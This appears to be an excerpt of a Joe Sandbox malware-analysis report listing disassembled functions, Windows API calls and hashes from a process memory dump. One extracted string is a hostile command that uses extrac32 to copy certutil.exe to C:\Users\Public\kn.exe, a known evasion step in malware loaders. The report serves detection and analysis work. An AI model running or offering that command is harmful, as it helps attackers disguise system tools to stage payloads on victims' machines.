Uniqueness Score: -1.00%

Function 00007FF683F781D4 Relevance: 4.8, APIs: 3, Instructions: 299COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 00007FF683F7826E
wcschr.MSVCRT ref: 00007FF683F78289

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: wcschr
String ID:
API String ID: 1497570035-0
Opcode ID: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
Instruction ID: f25c9e5dcee27990b77c37ac0d5873e90770e86d080526c4b1826f7f5c6f6073
Opcode Fuzzy Hash: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
Instruction Fuzzy Hash: 7AC1D361A09682C6EA549F16E4532BA67A0FF84794F0C413EEA5EE77D5DF3CE840C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F97B4C Relevance: 4.8, APIs: 3, Instructions: 269fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F97CE2
FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F97E92
FindClose.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F97EB0

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
Instruction ID: 670fb3b49c5cd602b3cc940efd77ea845f1e16f8769e57a867f4cba8194b7752
Opcode Fuzzy Hash: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
Instruction Fuzzy Hash: B7A13811B18396C5EE54BF6694122B96290BF44BE4F4C4239EE6EA77C4EE3CE406C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F76BE0 Relevance: 4.7, APIs: 3, Instructions: 184COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683F7CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF683F7B9A1,?,?,?,?,00007FF683F7D81A), ref: 00007FF683F7CDA6
Part of subcall function 00007FF683F7CD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF683F7B9A1,?,?,?,?,00007FF683F7D81A), ref: 00007FF683F7CDBD

_pipe.MSVCRT ref: 00007FF683F76C1E

Part of subcall function 00007FF683F7AFFC: _dup.MSVCRT ref: 00007FF683F7B004

Part of subcall function 00007FF683F7B038: _dup2.MSVCRT ref: 00007FF683F7B04D

_get_osfhandle.MSVCRT ref: 00007FF683F76CD1
DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF683F76CFB

Part of subcall function 00007FF683F7B998: memset.MSVCRT ref: 00007FF683F7BA2B
Part of subcall function 00007FF683F7B998: wcschr.MSVCRT ref: 00007FF683F7BA8A
Part of subcall function 00007FF683F7B998: wcschr.MSVCRT ref: 00007FF683F7BAAA
Part of subcall function 00007FF683F7B998: _wcsicmp.MSVCRT ref: 00007FF683F7BB2C

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Heapwcschr$AllocateDuplicateHandleProcess_dup_dup2_get_osfhandle_pipe_wcsicmpmemset
String ID:
API String ID: 1037144754-0
Opcode ID: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
Instruction ID: 2438e338bb4dcbbd25659efefb58172e8f992755cd5420996b7db9f3e2395c19
Opcode Fuzzy Hash: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
Instruction Fuzzy Hash: F4716B71A09682C6E754AF25D84207876A1FF89754F5C823CDA5DEB3E5CF3CA852CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F963FC Relevance: 4.7, APIs: 3, Instructions: 179threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F964FD
IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0 ref: 00007FF683F965F5
OutputDebugStringW.API-MS-WIN-CORE-DEBUG-L1-1-0 ref: 00007FF683F9666F

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: CurrentDebugDebuggerOutputPresentStringThread
String ID:
API String ID: 4268342597-0
Opcode ID: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
Instruction ID: c1818a4881227f3e394ebda71666fb85a95e4942cd9348f7eccbeb323c0fa408
Opcode Fuzzy Hash: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
Instruction Fuzzy Hash: 37812922A08B92C5EB649F26A44227977A0FF89B94F1C413ECE4DA7754DF3CE445C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F888C0 Relevance: 4.6, APIs: 3, Instructions: 68nativethreadCOMMON

Download Yara Rule

APIs

NtOpenThreadToken.NTDLL ref: 00007FF683F888E7
NtOpenProcessToken.NTDLL ref: 00007FF683F88907
NtClose.NTDLL ref: 00007FF683F8896C

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: OpenToken$CloseProcessThread
String ID:
API String ID: 2991381754-0
Opcode ID: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
Instruction ID: 94b02edd479993fbc4fb2c6ad1aeca0dfcb2135c2ba28f88ee9e9f0c3a72eedd
Opcode Fuzzy Hash: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
Instruction Fuzzy Hash: E321D132B48682CBE7148F51D4422BDB760FF85BA0F584139DB59A7684DF7CE84ACB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7586C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF683F9C59E), ref: 00007FF683F75879

Part of subcall function 00007FF683F758D4: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF683F75903
Part of subcall function 00007FF683F758D4: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF683F75943
Part of subcall function 00007FF683F758D4: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF683F75956

Strings

%d.%d.%05d.%d, xrefs: 00007FF683F758B2

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: CloseOpenQueryValueVersion
String ID: %d.%d.%05d.%d
API String ID: 2996790148-3457777122
Opcode ID: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
Instruction ID: 0a26cb07706652d79efa22a51badea53ae522221b3cb314496eeabfaade28e78
Opcode Fuzzy Hash: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
Instruction Fuzzy Hash: 3AF0A062A0C385C7D7109F16B54106AAAA1FF88780F588138DA4A67B5ACF3CD524CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F87854 Relevance: 3.3, APIs: 2, Instructions: 296COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F8790B

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F87B79

Part of subcall function 00007FF683F8823C: FindFirstFileExW.KERNELBASE ref: 00007FF683F88280
Part of subcall function 00007FF683F8823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F8829D

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset$ErrorFileFindFirstLast
String ID:
API String ID: 2831795651-0
Opcode ID: 43a4daf2934dc4b37ff691b1a4b1263eebb1773a1fb1ad015dd0d80b276b2dc6
Instruction ID: 8b5e9949906dac969e08a01638b02018bb0bb765ee87828a2a31bcde56b58c18
Opcode Fuzzy Hash: 43a4daf2934dc4b37ff691b1a4b1263eebb1773a1fb1ad015dd0d80b276b2dc6
Instruction Fuzzy Hash: FDD1F472A08782C6EB689F26E4412BA77A1FF44798F181139DE4DA7798CF3CE545C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F77D30 Relevance: 3.3, APIs: 2, Instructions: 252COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F77DA1

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

Part of subcall function 00007FF683F8417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F841AD

Part of subcall function 00007FF683F7D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7D46E
Part of subcall function 00007FF683F7D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7D485
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D4EE
Part of subcall function 00007FF683F7D3F0: iswspace.MSVCRT ref: 00007FF683F7D54D
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D569
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D58C

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F77EB7

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
String ID:
API String ID: 168394030-0
Opcode ID: a65c63928f551fb8768bc8e3d10b498b84304c82453fdb636945e23039fb0caa
Instruction ID: cadb3c104bcf4df10803cfebe9dfae8d967c1356d6ead6e656c215d41e4b7bcb
Opcode Fuzzy Hash: a65c63928f551fb8768bc8e3d10b498b84304c82453fdb636945e23039fb0caa
Instruction Fuzzy Hash: 72A10721B1D686C5FB689B26D8522B923A1FF85784F484139DD1EE76E5DF3CE805C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F889E4 Relevance: 3.0, APIs: 2, Instructions: 43nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationToken.NTDLL ref: 00007FF683F88A20
NtQueryInformationToken.NTDLL ref: 00007FF683F952BE

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: InformationQueryToken
String ID:
API String ID: 4239771691-0
Opcode ID: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
Instruction ID: 340e24f325fcaecbf03c9e42e6a4cf9e722e28dc7cd48ae560cfa042acfcad0e
Opcode Fuzzy Hash: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
Instruction Fuzzy Hash: 1F115BB2A58781DBEB108F02E4013E9BBA4FF857A5F048135DB4897694DF7DE588CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F88114 Relevance: 3.0, APIs: 2, Instructions: 41filenativeCOMMON

Download Yara Rule

APIs

NtQueryVolumeInformationFile.NTDLL ref: 00007FF683F88151
GetFileInformationByHandleEx.API-MS-WIN-CORE-FILE-L2-1-0 ref: 00007FF683F9037C

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: FileInformation$HandleQueryVolume
String ID:
API String ID: 2149833895-0
Opcode ID: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
Instruction ID: b8a5c298182c7d3d5ced579b94c061c181c480bb72df571991aa9deb150dd329
Opcode Fuzzy Hash: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
Instruction Fuzzy Hash: DE1133316187C2C6EB608B51F4467AEB7A0FF48B48F485539DA9DA3A54DFBCD448CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F78510 Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683F7D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7D46E
Part of subcall function 00007FF683F7D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7D485
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D4EE
Part of subcall function 00007FF683F7D3F0: iswspace.MSVCRT ref: 00007FF683F7D54D
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D569
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D58C

towupper.MSVCRT ref: 00007FF683F785D4

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: wcschr$Heap$AllocProcessiswspacetowupper
String ID:
API String ID: 3520273530-0
Opcode ID: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
Instruction ID: 43e248f5de5dd1be1f6b1192d6c8173be8020ff10e0450f7eb1bf8cd55e4e445
Opcode Fuzzy Hash: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
Instruction Fuzzy Hash: 7D61B022A0D246C6E7689F25D50737926A0FF087A4F48813ADA1EB72D5DE3CA894C391

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F8898C Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationToken.NTDLL ref: 00007FF683F889B6

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: InformationQueryToken
String ID:
API String ID: 4239771691-0
Opcode ID: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
Instruction ID: 2f984981ca196080d9a23e21e61a22305b34837fc6f00279bcd4075d0c45abef
Opcode Fuzzy Hash: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
Instruction Fuzzy Hash: B7F030B3704B81CBD7008F65E58549CB778FB44B88759853ACB2843704DB75D9A5CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F893B0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F893BB

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
Instruction ID: 2ab56fbe33362fd11083134f1f5b014b21bb885517d09a47328652c96d5a08ea
Opcode Fuzzy Hash: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
Instruction Fuzzy Hash: 4CB01210F65403E1DA0CAB32DC8306112A07F5C710FD40436C00FE2160DE1C91DBC740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7F8C0 Relevance: 40.6, APIs: 21, Strings: 2, Instructions: 380COMMON

Download Yara Rule

APIs

EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF683F7F52A,00000000,00000000,?,00000000,?,00007FF683F7E626,?,?,00000000,00007FF683F81F69), ref: 00007FF683F7F8DE
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF683F81F69,?,?,?,?,?,?,?,00007FF683F7286E,00000000,00000000,00000000,00000000), ref: 00007FF683F7F8FB
EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF683F81F69,?,?,?,?,?,?,?,00007FF683F7286E,00000000,00000000,00000000,00000000), ref: 00007FF683F7F951
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF683F81F69,?,?,?,?,?,?,?,00007FF683F7286E,00000000,00000000,00000000,00000000), ref: 00007FF683F7F96B
wcschr.MSVCRT ref: 00007FF683F7FA8E
_get_osfhandle.MSVCRT ref: 00007FF683F7FB14
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF683F81F69,?,?,?,?,?,?,?,00007FF683F7286E,00000000,00000000,00000000,00000000), ref: 00007FF683F7FB2D
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF683F81F69,?,?,?,?,?,?,?,00007FF683F7286E,00000000,00000000,00000000,00000000), ref: 00007FF683F7FBEA
_get_osfhandle.MSVCRT ref: 00007FF683F7F996

Part of subcall function 00007FF683F80010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF683F9849D,?,?,?,00007FF683F9F0C7), ref: 00007FF683F80045
Part of subcall function 00007FF683F80010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF683F9F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF683F9E964), ref: 00007FF683F80071
Part of subcall function 00007FF683F80010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F80092
Part of subcall function 00007FF683F80010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF683F800A7
Part of subcall function 00007FF683F80010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF683F80181

EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF683F81F69,?,?,?,?,?,?,?,00007FF683F7286E,00000000,00000000,00000000,00000000), ref: 00007FF683F8D401
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF683F81F69,?,?,?,?,?,?,?,00007FF683F7286E,00000000,00000000,00000000,00000000), ref: 00007FF683F8D41B
longjmp.MSVCRT(?,?,00000000,00007FF683F81F69,?,?,?,?,?,?,?,00007FF683F7286E,00000000,00000000,00000000,00000000), ref: 00007FF683F8D435
longjmp.MSVCRT(?,?,00000000,00007FF683F81F69,?,?,?,?,?,?,?,00007FF683F7286E,00000000,00000000,00000000,00000000), ref: 00007FF683F8D480

Strings

=,;, xrefs: 00007FF683F7F8C8
extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF683F7F90E

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
